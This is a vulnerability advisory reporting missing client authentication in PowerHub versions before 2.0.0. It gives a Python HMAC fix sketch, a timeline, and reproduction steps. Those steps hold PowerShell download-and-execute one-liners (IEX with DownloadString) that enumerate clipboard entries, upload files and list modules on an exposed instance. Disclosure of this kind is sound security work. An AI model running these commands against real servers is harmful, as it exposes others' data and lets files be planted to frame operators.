
Security vulnerability

General information
Vulnerability type: Missing authentication / Information Disclosure
Affected product: https://github.com/AdrianVollmer/PowerHub
Reporter: security-research@six-two.dev
Affected version(s): < 2.0.0
Fixed version: 2.0.0

Short summary

PowerHub does not authenticate its clients. This allows malicious actors to connect to a PowerHub instance as a client, read clipboard entries, obtain the name of the user running PowerHub, upload files and download modules (which may contain proprietary code). Attackers can also use publicly accessible PowerHub instances in their own attacks, which may be used to frame the operator of the server PowerHub is running on.

Recommendation

Client authentication

I would recommend adding a secret token variable to the launcher code:

$T='RandomSecretToken'; $K=New-Object Net.WebClient;'a=reflection','t=http'|%{IEX $K.DownloadString('http://192.168.0.116:8080/0?'+$_)} 

The token variable's contents can then be used to authenticate any requests performed by the client.

The token may be passed as an HTTP header. Alternatively, an HMAC over the request body could be computed and used to verify that the client knows the secret:

VerificationToken = HMAC(Token, HttpBody)

Prevent username leak

It is recommended to remove the username from the List-HubModules command output. Ideally, only paths relative to the modules directory, such as ./custom.ps1, would be shown.
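The two recommendations above (an HMAC over the request body that proves the client knows the token, and a module listing that no longer contains the home directory) can be sketched in a few lines of server-side Python. The following example is added here for illustration; it is not PowerHub's own code. The header names X-PowerHub-Auth and X-PowerHub-Time, the timestamp that is signed together with the body to bound replay, and the sample paths are assumptions of this example, not part of the project.

```python
import hashlib
import hmac
import os
import time

# Assumed header names for this example; PowerHub defines no such headers.
AUTH_HEADER = "X-PowerHub-Auth"
TIME_HEADER = "X-PowerHub-Time"
MAX_SKEW_SECONDS = 300  # a captured request stays replayable for at most five minutes


def sign_request(token: str, body: bytes, timestamp: int) -> dict:
    """Client side: headers for one request.

    This is VerificationToken = HMAC(Token, HttpBody) from the recommendation,
    with the timestamp prepended to the signed data so that a recorded request
    cannot be replayed indefinitely (a design choice of this example).
    """
    message = str(timestamp).encode() + b"\n" + body
    mac = hmac.new(token.encode(), message, hashlib.sha256).hexdigest()
    return {AUTH_HEADER: mac, TIME_HEADER: str(timestamp)}


def verify_request(token: str, headers: dict, body: bytes, now: int) -> bool:
    """Server side: accept the request only if the client knows the token.

    Recomputes the MAC over the received body and compares it in constant
    time; a missing header, a stale timestamp, a modified body or a wrong
    token all lead to rejection.
    """
    presented = headers.get(AUTH_HEADER)
    stamp = headers.get(TIME_HEADER)
    if presented is None or stamp is None or not stamp.isdigit():
        return False
    if abs(now - int(stamp)) > MAX_SKEW_SECONDS:
        return False
    expected = sign_request(token, body, int(stamp))[AUTH_HEADER]
    # compare_digest does not short-circuit on the first differing byte
    return hmac.compare_digest(expected, presented)


def relative_module_paths(modules_dir: str, module_paths: list) -> list:
    """Rewrite module paths relative to the modules directory (./custom.ps1)
    so the listing does not reveal /home/<user>/...; anything outside the
    directory is dropped rather than disclosed."""
    base = os.path.abspath(modules_dir)
    result = []
    for path in module_paths:
        full = os.path.abspath(path)
        if os.path.commonpath([base, full]) != base:
            continue
        result.append("./" + os.path.relpath(full, base))
    return result


if __name__ == "__main__":
    token = "RandomSecretToken"  # the $T value embedded in the launcher
    body = b"a=reflection&t=http&c=1"  # constructed request body
    now = int(time.time())
    headers = sign_request(token, body, now)
    print(verify_request(token, headers, body, now))                        # True
    print(verify_request(token, headers, b"a=reflection&t=http&c=2", now))  # False: body changed
    print(verify_request("guess", headers, body, now))                      # False: wrong token
    print(verify_request(token, headers, body, now + 3600))                 # False: stale
    # constructed paths; "alice" stands in for the operator's account name
    print(relative_module_paths(
        "/home/alice/.local/share/powerhub/modules",
        ["/home/alice/.local/share/powerhub/modules/custom.ps1", "/etc/passwd"]))
```

Signing the timestamp as well as the body goes one step beyond the bare HMAC(Token, HttpBody) formula: without it, a recorded request such as the clipboard fetch with c=1 could be resent by anyone for as long as the token is valid. The constant-time comparison matters because the server otherwise leaks, byte by byte, how much of a guessed MAC was correct.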

Reproduction / Proof of Concept(s)

Due to time constraints, I have not actually developed an easy way to read the modules, clipboard entries, etc. However, since PowerShell executes the code, it should be possible to obtain this data by attaching a debugger or by writing a custom client based on the PowerHub source code.

Testing environment

As the target I used PowerHub installed on my host (Linux) via pip:

$ pip install powerhub
$ pip show powerhub
Name: PowerHub
Version: 1.11
[...]

As the attacker's machine I used a Windows VM, connected to the host via the Bridged Adapter option of VirtualBox.

Setup

Victim

  1. Start PowerHub: powerhub 192.168.0.116 --auth user:password
  2. Log in to the web interface and add two clipboard entries.
  3. Create a custom module (~/.local/share/powerhub/modules/custom.ps1).

Attacker

  1. Run a local PowerHub instance, log in to its web interface and grab the commands to execute on the client. Replace the local address and port with those of the victim.
  2. Execute these commands in a Windows PowerShell.

(1) Reading clipboard entries

Clipboard entries might be used to store sensitive information (such as command output containing hashes or passwords) to make it easily available on multiple machines, or they may contain proprietary code that is not intended to be leaked.

Clipboard entries are referenced by a counter, which makes them trivial to enumerate.

Clipboard entry 1:

$K=New-Object Net.WebClient;'a=reflection','t=http&c=1'|%{IEX $K.DownloadString('http://192.168.0.116:8080/0?'+$_)}

Clipboard entry 2:

$K=New-Object Net.WebClient;'a=reflection','t=http&c=2'|%{IEX $K.DownloadString('http://192.168.0.116:8080/0?'+$_)}

(2) Uploading files

Using the PushTo-Hub command, clients can upload files to the PowerHub server. Attackers may use this to fill the server's disk space (which may affect system availability) or to upload illegal content to frame the victim.

PS C:\Users\Admin>  $K=New-Object Net.WebClient;'a=reflection','t=http'|%{IEX $K.DownloadString('http://192.168.0.116:8080/0?'+$_)}
True
  _____   _____  _  _  _ _______  ______ _     _ _     _ ______
 |_____] |     | |  |  | |______ |_____/ |_____| |     | |_____]
 |       |_____| |__|__| |______ |    \_ |     | |_____| |_____]
1.11                        written by Adrian Vollmer, 2018-2022
Run 'Help-PowerHub' for help
PS C:\Users\Admin> PushTo-Hub C:\Users\Admin\Desktop\hacked.txt

Similarly, the Mount-Webdav functionality can be used to upload files. Since attackers have read/write access to certain folders, it may also be used to distribute illegal content.

PS C:\Users\Admin> Mount-Webdav
PS C:\Users\Admin>

Files stored on the server (victim):

$ tree ~/.local/share/powerhub -h
[...]
├── [4.0K]  upload
│   └── [  20]  hacked.txt
├── [4.0K]  webdav
│   ├── [4.0K]  blackhole
│   ├── [5.9K]  New Text Document.txt
│   └── [4.0K]  public
│       └── [   4]  New Text Document.txt
[...]

(3) Listing and downloading modules

Clients can obtain a list of modules (PowerShell scripts and executables). Attackers may use this to download modules from the server. If these modules contain confidential data (such as proprietary exploits or credentials for backdoors), that data can be accessed by anyone.

PS C:\Users\Admin> lshm

N Type Name                                                Loaded
- ---- ----                                                ------
0 ps1  /home/REDACTED/.local/share/powerhub/modules/custom.ps1 False
PS C:\Users\Admin> lhm 1
PS C:\Users\Admin>

This call additionally reveals the user's name, which may be used in attacks such as SSH password guessing.

Solution

The problems were fixed in version 2.0.0. The response from the developer explains it best:

Hi,

version 2.0.0 has now been released. It should now be impossible to find an endpoint that discloses clipboard entries without knowing the key. Finding the key without knowing it already should also be impossible. And even then, only clipboard entries that have been marked as "executable" will be disclosed. Thanks again for reporting.

Timeline

Vulnerabilities discovered: 2022-08-13
Vulnerabilities reported: 2022-08-15
Vulnerabilities resolved: 2023-02-26
Published this advisory: 2023-08-01

Note: The vulnerabilities were fixed as part of a big rewrite (PowerHub version 2), which is why the fix took a while to roll out.


Last update: 2023-08-02